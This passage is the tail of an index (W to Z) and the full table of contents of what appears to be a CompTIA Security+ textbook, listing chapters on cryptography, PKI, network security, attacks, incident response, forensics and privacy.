  setting up WPA2, 355–357
  WAP (Wireless Application Protocol), 340–341
  wireless devices and, 264–265
wireless systems, configuring
  antenna placement, 360–361
  antenna types, 359–360
  captive portals, 362
  overview of, 359
  power levels, 361
  securing public Wi-Fi, 362
  site surveys, 361–362
Wireless Transport Layer Security (WTLS), 184, 340–341
Wireshark
  open source protocol analyzer, 399
  sniffers used in attacks on IEEE 802.11, 352
  TCP/IP traces, 403
WLANs (wireless LANs), 337
Worcester Airport incident, 2
workstations
  antivirus software for, 429–430
  forensic workstation, 681
  infrastructure security, 253
  securing, 412
World Wide Web Consortium (W3C), 176–178
World Wide Web (WWW), 242
worms
  e-mail malware, 510, 512
  examples of and protection against, 469
  historical security incidents, 2–4
  Qakbot worm, 662
  types of threats, 8
WPA (Wi-Fi Protected Access)
  overview of, 354–355
  setting up WPA2, 355–357
WPA2 (Wi-Fi Protected Access 2), 355
WPS (Wi-Fi Protected Setup), 355
wrappers. See TCP wrappers
write blockers, in forensic investigation, 683
WSUS (Windows Server Update Services), 447–448
WTLS (Wireless Transport Layer Security), 184, 340–341
WWW (World Wide Web), 242
X
X.25 protocol, 224
X.500 standard
  covering certificates used for authentication, 172
  for directory services, 539
  distinguished names, 144
X.509 standard
  for digital certificates, 134
  overview of, 172
  PKC (Public Key Certificate), 168
  uses with TLS, 357
XACML (eXtensible Access Control Markup Language), 304
XKMS (XML Key Management Specification), 176–178
XMAS attack, 486
XML injection attacks, 574
XML Key Management Specification (XKMS), 176–178
XOR (eXclusive OR), use in cryptography, 97
XSRF (cross-site request forgery)
  input validation and, 569
  overview of, 576–577
XSS (cross-site scripting) attacks
  input validation and, 569
  overview of, 572–573
Y
Yagi antennas, 360
Z
Zenmap port scanner, 402
zero-day vulnerabilities, 577
ZigBee wireless bands, 337
Zimmermann, Philip, 122
zombies, in DDoS attacks, 476
ZoneAlarm, from Check Point Software Technologies, 436
zones, in network control systems, 246
zones, security. See security zones
- Title Page
- Copyright
- About the Authors
- Acknowledgments
- Contents at a Glance
- Contents
- Foreword
- Preface
- Introduction
- Instructor Web Site
- Chapter 1 Introduction and Security Trends
- The Computer Security Problem
- Definition of Computer Security
- Historical Security Incidents
- The Current Threat Environment
- Threats to Security
- Security Trends
- Targets and Attacks
- Specific Target
- Opportunistic Target
- Minimizing Possible Avenues of Attack
- Approaches to Computer Security
- Ethics
- Additional References
- Chapter 1 Review
- Chapter 2 General Security Concepts
- Basic Security Terminology
- Security Basics
- Security Tenets
- Security Approaches
- Security Principles
- Access Control
- Authentication Mechanisms
- Authentication and Access Control Policies
- Security Models
- Confidentiality Models
- Integrity Models
- Chapter 2 Review
- Chapter 3 Operational and Organizational Security
- Policies, Procedures, Standards, and Guidelines
- Security Policies
- Change Management Policy
- Data Policies
- Human Resources Policies
- Due Care and Due Diligence
- Due Process
- Incident Response Policies and Procedures
- Security Awareness and Training
- Security Policy Training and Procedures
- Role-Based Training
- Compliance with Laws, Best Practices, and Standards
- User Habits
- New Threats and Security Trends/Alerts
- Training Metrics and Compliance
- Interoperability Agreements
- Service Level Agreements
- Business Partnership Agreement
- Memorandum of Understanding
- Interconnection Security Agreement
- The Security Perimeter
- Physical Security
- Physical Access Controls
- Physical Barriers
- Environmental Issues
- Fire Suppression
- Wireless
- Electromagnetic Eavesdropping
- Modern Eavesdropping
- Chapter 3 Review
- Chapter 4 The Role of People in Security
- People—A Security Problem
- Social Engineering
- Poor Security Practices
- People as a Security Tool
- Security Awareness
- Security Policy Training and Procedures
- Chapter 4 Review
- Chapter 5 Cryptography
- Cryptography in Practice
- Fundamental Methods
- Comparative Strengths and Performance of Algorithms
- Historical Perspectives
- Substitution Ciphers
- One-Time Pads
- Algorithms
- Key Management
- Random Numbers
- Hashing Functions
- SHA
- RIPEMD
- Message Digest
- Hashing Summary
- Symmetric Encryption
- DES
- 3DES
- AES
- CAST
- RC
- Blowfish
- Twofish
- IDEA
- Block vs. Stream
- Symmetric Encryption Summary
- Asymmetric Encryption
- Diffie-Hellman
- RSA
- ElGamal
- ECC
- Asymmetric Encryption Summary
- Symmetric vs. Asymmetric
- Quantum Cryptography
- Steganography
- Cryptography Algorithm Use
- Confidentiality
- Integrity
- Authentication
- Nonrepudiation
- Cipher Suites
- Key Exchange
- Key Escrow
- Session Keys
- Ephemeral Keys
- Key Stretching
- Secrecy Principles
- Transport Encryption
- Digital Signatures
- Digital Rights Management
- Cryptographic Applications
- Use of Proven Technologies
- Chapter 5 Review
- Chapter 6 Public Key Infrastructure
- The Basics of Public Key Infrastructures
- Certificate Authorities
- Registration Authorities
- Local Registration Authorities
- Digital Certificates
- Certificate Extensions
- Certificate Attributes
- Certificate Lifecycles
- Registration and Generation
- CSR
- Renewal
- Suspension
- Revocation
- Key Destruction
- Certificate Repositories
- Trust and Certificate Verification
- Centralized and Decentralized Infrastructures
- Hardware Security Modules
- Private Key Protection
- Key Recovery
- Key Escrow
- Public Certificate Authorities
- In-House Certificate Authorities
- Choosing Between a Public CA and an In-House CA
- Outsourced Certificate Authorities
- Tying Different PKIs Together
- Trust Models
- Certificate-Based Threats
- Stolen Certificates
- Chapter 6 Review
- Chapter 7 PKI Standards and Protocols
- PKIX and PKCS
- PKIX Standards
- PKCS
- Why You Need to Know the PKIX and PKCS Standards
- X.509
- SSL/TLS
- Cipher Suites
- ISAKMP
- CMP
- XKMS
- S/MIME
- IETF S/MIME History
- IETF S/MIME v3 Specifications
- PGP
- How PGP Works
- HTTPS
- IPsec
- CEP
- Other Standards
- FIPS
- Common Criteria
- WTLS
- ISO/IEC 27002 (Formerly ISO 17799)
- SAML
- Chapter 7 Review
- Chapter 8 Physical Security
- The Security Problem
- Physical Security Safeguards
- Walls and Guards
- Physical Access Controls and Monitoring
- Convergence
- Policies and Procedures
- Environmental Controls
- Fire Suppression
- Water-Based Fire Suppression Systems
- Halon-Based Fire Suppression Systems
- Clean-Agent Fire Suppression Systems
- Handheld Fire Extinguishers
- Fire Detection Devices
- Power Protection
- UPS
- Backup Power and Cable Shielding
- Electromagnetic Interference
- Electronic Access Control Systems
- Access Tokens
- Chapter 8 Review
- Chapter 9 Network Fundamentals
- Network Architectures
- Network Topology
- Network Protocols
- Protocols
- Packets
- Internet Protocol
- IP Packets
- TCP vs. UDP
- ICMP
- IPv4 vs. IPv6
- Packet Delivery
- Ethernet
- Local Packet Delivery
- Remote Packet Delivery
- IP Addresses and Subnetting
- Network Address Translation
- Security Zones
- DMZ
- Internet
- Intranet
- Extranet
- Flat Networks
- Enclaves
- VLANs
- Zones and Conduits
- Tunneling
- Storage Area Networks
- iSCSI
- Fibre Channel
- FCoE
- Chapter 9 Review
- Chapter 10 Infrastructure Security
- Devices
- Workstations
- Servers
- Virtualization
- Mobile Devices
- Device Security, Common Concerns
- Network Attached Storage
- Removable Storage
- Networking
- Network Interface Cards
- Hubs
- Bridges
- Switches
- Routers
- Firewalls
- How Do Firewalls Work?
- Next-Generation Firewalls
- Web Application Firewalls vs. Network Firewalls
- Concentrators
- Wireless Devices
- Modems
- Telephony
- VPN Concentrator
- Security Devices
- Intrusion Detection Systems
- Network Access Control
- Network Monitoring/Diagnostic
- Load Balancers
- Proxies
- Web Security Gateways
- Internet Content Filters
- Data Loss Prevention
- Unified Threat Management
- Media
- Coaxial Cable
- UTP/STP
- Fiber
- Unguided Media
- Removable Media
- Magnetic Media
- Optical Media
- Electronic Media
- Security Concerns for Transmission Media
- Physical Security Concerns
- Cloud Computing
- Private
- Public
- Hybrid
- Community
- Software as a Service
- Platform as a Service
- Infrastructure as a Service
- Chapter 10 Review
- Chapter 11 Authentication and Remote Access
- User, Group, and Role Management
- User
- Group
- Role
- Password Policies
- Domain Password Policy
- Single Sign-On
- Time of Day Restrictions
- Tokens
- Account and Password Expiration
- Security Controls and Permissions
- Access Control Lists
- Mandatory Access Control (MAC)
- Discretionary Access Control (DAC)
- Role-Based Access Control (RBAC)
- Rule-Based Access Control
- Attribute Based Access Control (ABAC)
- Account Expiration
- Preventing Data Loss or Theft
- The Remote Access Process
- Identification
- Authentication
- Authorization
- Access Control
- Remote Access Methods
- IEEE 802.1X
- RADIUS
- TACACS+
- Authentication Protocols
- FTP/FTPS/SFTP
- VPNs
- IPsec
- Vulnerabilities of Remote Access Methods
- Connection Summary
- Chapter 11 Review
- Chapter 12 Wireless Security and Mobile Devices
- Introduction to Wireless Networking
- Mobile Phones
- Wireless Application Protocol
- 3G Mobile Networks
- 4G Mobile Networks
- Bluetooth
- Bluetooth Attacks
- Near Field Communication
- IEEE 802.11 Series
- 802.11: Individual Standards
- Attacking 802.11
- Current Security Methods
- Wireless Systems Configuration
- Antenna Types
- Antenna Placement
- Power Level Controls
- Site Surveys
- Captive Portals
- Securing Public Wi-Fi
- Mobile Devices
- Mobile Device Security
- BYOD Concerns
- Location Services
- Mobile Application Security
- Chapter 12 Review
- Chapter 13 Intrusion Detection Systems and Network Security
- History of Intrusion Detection Systems
- IDS Overview
- IDS Models
- Signatures
- False Positives and False Negatives
- Network-Based IDSs
- Advantages of a NIDS
- Disadvantages of a NIDS
- Active vs. Passive NIDSs
- NIDS Tools
- Host-Based IDSs
- Advantages of HIDSs
- Disadvantages of HIDSs
- Active vs. Passive HIDSs
- Resurgence and Advancement of HIDSs
- Intrusion Prevention Systems
- Honeypots and Honeynets
- Tools
- Protocol Analyzer
- Switched Port Analyzer
- Port Scanner
- Passive vs. Active Tools
- Banner Grabbing
- Chapter 13 Review
- Chapter 14 System Hardening and Baselines
- Overview of Baselines
- Operating System and Network Operating System Hardening
- OS Security
- Host Security
- Machine Hardening
- Operating System Security and Settings
- OS Hardening
- Hardening Microsoft Operating Systems
- Hardening UNIX- or Linux-Based Operating Systems
- Updates (a.k.a. Hotfixes, Service Packs, and Patches)
- Antimalware
- White Listing vs. Black Listing Applications
- Trusted OS
- Host-based Firewalls
- Hardware Security
- Host Software Baselining
- Host-Based Security Controls
- Hardware-Based Encryption Devices
- Data Encryption
- Data Security
- Handling Big Data
- Cloud Storage
- Storage Area Network
- Permissions/ACL
- Network Hardening
- Software Updates
- Device Configuration
- Securing Management Interfaces
- VLAN Management
- IPv4 vs. IPv6
- Application Hardening
- Application Configuration Baseline
- Application Patches
- Patch Management
- Host Software Baselining
- Group Policies
- Security Templates
- Alternative Environments
- SCADA
- Embedded Systems
- Phones and Mobile Devices
- Mainframe
- Game Consoles
- In-Vehicle Computing Systems
- Alternative Environment Methods
- Network Segmentation
- Security Layers
- Application Firewalls
- Manual Updates
- Firmware Version Control
- Wrappers
- Control Redundancy and Diversity
- Chapter 14 Review
- Chapter 15 Types of Attacks and Malicious Software
- Avenues of Attack
- Minimizing Possible Avenues of Attack
- Malicious Code
- Viruses
- Worms
- Polymorphic Malware
- Trojan Horses
- Rootkits
- Logic Bombs
- Spyware
- Adware
- Botnets
- Backdoors and Trapdoors
- Ransomware
- Malware Defenses
- Attacking Computer Systems and Networks
- Denial-of-Service Attacks
- Social Engineering
- Null Sessions
- Sniffing
- Spoofing
- TCP/IP Hijacking
- Man-in-the-Middle Attacks
- Replay Attacks
- Transitive Access
- Spam
- Spim
- Phishing
- Spear Phishing
- Vishing
- Pharming
- Scanning Attacks
- Attacks on Encryption
- Address System Attacks
- Cache Poisoning
- Password Guessing
- Pass-the-Hash Attacks
- Software Exploitation
- Client-Side Attacks
- Advanced Persistent Threat
- Remote Access Trojans
- Tools
- Metasploit
- BackTrack/Kali
- Social-Engineering Toolkit
- Cobalt Strike
- Core Impact
- Burp Suite
- Auditing
- Perform Routine Audits
- Chapter 15 Review
- Chapter 16 E-Mail and Instant Messaging
- How E-Mail Works
- E-Mail Structure
- MIME
- Security of E-Mail
- Malicious Code
- Hoax E-Mails
- Unsolicited Commercial E-Mail (Spam)
- Sender ID Framework
- DomainKeys Identified Mail
- Mail Encryption
- S/MIME
- PGP
- Instant Messaging
- Modern Instant Messaging Systems
- Chapter 16 Review
- Chapter 17 Web Components
- Current Web Components and Concerns
- Web Protocols
- Encryption (SSL and TLS)
- The Web (HTTP and HTTPS)
- HTTPS Everywhere
- HTTP Strict Transport Security
- Directory Services (DAP and LDAP)
- File Transfer (FTP and SFTP)
- Vulnerabilities
- Code-Based Vulnerabilities
- Buffer Overflows
- Java
- JavaScript
- ActiveX
- Securing the Browser
- CGI
- Server-Side Scripts
- Cookies
- Browser Plug-ins
- Malicious Add-ons
- Signed Applets
- Application-Based Weaknesses
- Session Hijacking
- Client-Side Attacks
- Web 2.0 and Security
- Chapter 17 Review
- Chapter 18 Secure Software Development
- The Software Engineering Process
- Process Models
- Secure Development Lifecycle
- Secure Coding Concepts
- Error and Exception Handling
- Input and Output Validation
- Fuzzing
- Bug Tracking
- Application Attacks
- Cross-Site Scripting
- Injections
- Directory Traversal/Command Injection
- Buffer Overflow
- Integer Overflow
- Cross-Site Request Forgery
- Zero-Day
- Attachments
- Locally Shared Objects
- Client-Side Attacks
- Arbitrary/Remote Code Execution
- Open Vulnerability and Assessment Language
- Application Hardening
- Application Configuration Baseline
- Application Patch Management
- NoSQL Databases vs. SQL Databases
- Server-Side vs. Client-Side Validation
- Chapter 18 Review
- Chapter 19 Business Continuity and Disaster Recovery, and Organizational Policies
- Business Continuity
- Business Continuity Plans
- Business Impact Analysis
- Identification of Critical Systems and Components
- Removing Single Points of Failure
- Risk Assessment
- Succession Planning
- Continuity of Operations
- Disaster Recovery
- Disaster Recovery Plans/Process
- Categories of Business Functions
- IT Contingency Planning
- Test, Exercise, and Rehearse
- Recovery Time Objective and Recovery Point Objective
- Backups
- Alternative Sites
- Utilities
- Secure Recovery
- Cloud Computing
- High Availability and Fault Tolerance
- Failure and Recovery Timing
- Chapter 19 Review
- Chapter 20 Risk Management
- An Overview of Risk Management
- Example of Risk Management at the International Banking Level
- Risk Management Vocabulary
- What Is Risk Management?
- Risk Management Culture
- Business Risks
- Examples of Business Risks
- Examples of Technology Risks
- Risk Mitigation Strategies
- Change Management
- Incident Management
- User Rights and Permissions Reviews
- Data Loss or Theft
- Risk Management Models
- General Risk Management Model
- Software Engineering Institute Model
- NIST Risk Models
- Model Application
- Qualitatively Assessing Risk
- Quantitatively Assessing Risk
- Adding Objectivity to a Qualitative Assessment
- Risk Calculation
- Qualitative vs. Quantitative Risk Assessment
- Tools
- Cost-Effectiveness Modeling
- Risk Management Best Practices
- System Vulnerabilities
- Threat Vectors
- Probability/Threat Likelihood
- Risk-Avoidance, Transference, Acceptance, Mitigation, Deterrence
- Risks Associated with Cloud Computing and Virtualization
- Chapter 20 Review
- Chapter 21 Change Management
- Why Change Management?
- The Key Concept: Separation of Duties
- Elements of Change Management
- Implementing Change Management
- Back-out Plan
- The Purpose of a Change Control Board
- Code Integrity
- The Capability Maturity Model Integration
- Chapter 21 Review
- Chapter 22 Incident Response
- Foundations of Incident Response
- Incident Management
- Anatomy of an Attack
- Goals of Incident Response
- Incident Response Process
- Preparation
- Security Measure Implementation
- Incident Identification/Detection
- Initial Response
- Incident Isolation
- Strategy Formulation
- Investigation
- Recovery/Reconstitution Procedures
- Reporting
- Follow-up/Lessons Learned
- Standards and Best Practices
- State of Compromise
- NIST
- Department of Justice
- Indicators of Compromise
- Cyber Kill Chain
- Making Security Measurable
- Chapter 22 Review
- Chapter 23 Computer Forensics
- Evidence
- Types of Evidence
- Standards for Evidence
- Three Rules Regarding Evidence
- Forensic Process
- Acquiring Evidence
- Identifying Evidence
- Protecting Evidence
- Transporting Evidence
- Storing Evidence
- Conducting the Investigation
- Analysis
- Chain of Custody
- Message Digest and Hash
- Host Forensics
- File Systems
- Windows Metadata
- Linux Metadata
- Device Forensics
- Network Forensics
- E-Discovery
- Reference Model
- Big Data
- Cloud
- Chapter 23 Review
- Chapter 24 Legal Issues and Ethics
- Cybercrime
- Common Internet Crime Schemes
- Sources of Laws
- Computer Trespass
- Significant U.S. Laws
- Payment Card Industry Data Security Standard (PCI DSS)
- Import/Export Encryption Restrictions
- Non-U.S. Laws
- Digital Signature Laws
- Digital Rights Management
- Ethics
- Chapter 24 Review
- Chapter 25 Privacy
- Personally Identifiable Information (PII)
- Sensitive PII
- Notice, Choice, and Consent
- U.S. Privacy Laws
- Privacy Act of 1974
- Freedom of Information Act (FOIA)
- Family Educational Rights and Privacy Act (FERPA)
- U.S. Computer Fraud and Abuse Act (CFAA)
- U.S. Children’s Online Privacy Protection Act (COPPA)
- Video Privacy Protection Act (VPPA)
- Health Insurance Portability & Accountability Act (HIPAA)
- Gramm-Leach-Bliley Act (GLBA)
- California Senate Bill 1386 (SB 1386)
- U.S. Banking Rules and Regulations
- Payment Card Industry Data Security Standard (PCI DSS)
- Fair Credit Reporting Act (FCRA)
- Fair and Accurate Credit Transactions Act (FACTA)
- Non-Federal Privacy Concerns in the United States
- International Privacy Laws
- OECD Fair Information Practices
- European Laws
- Canadian Laws
- Asian Laws
- Privacy-Enhancing Technologies
- Privacy Policies
- Privacy Impact Assessment
- Web Privacy Issues
- Cookies
- Privacy in Practice
- User Actions
- Data Breaches
- Chapter 25 Review
- Appendix A CompTIA Security+ Exam Objectives: SY0-401
- Appendix B About the Download
- System Requirements
- Downloading Total Tester Premium Practice Exam Software
- Total Tester Premium Practice Exam Software
- Installing and Running Total Tester
- Technical Support
- Total Seminars Technical Support
- McGraw-Hill Education Content Support
- Glossary
- Index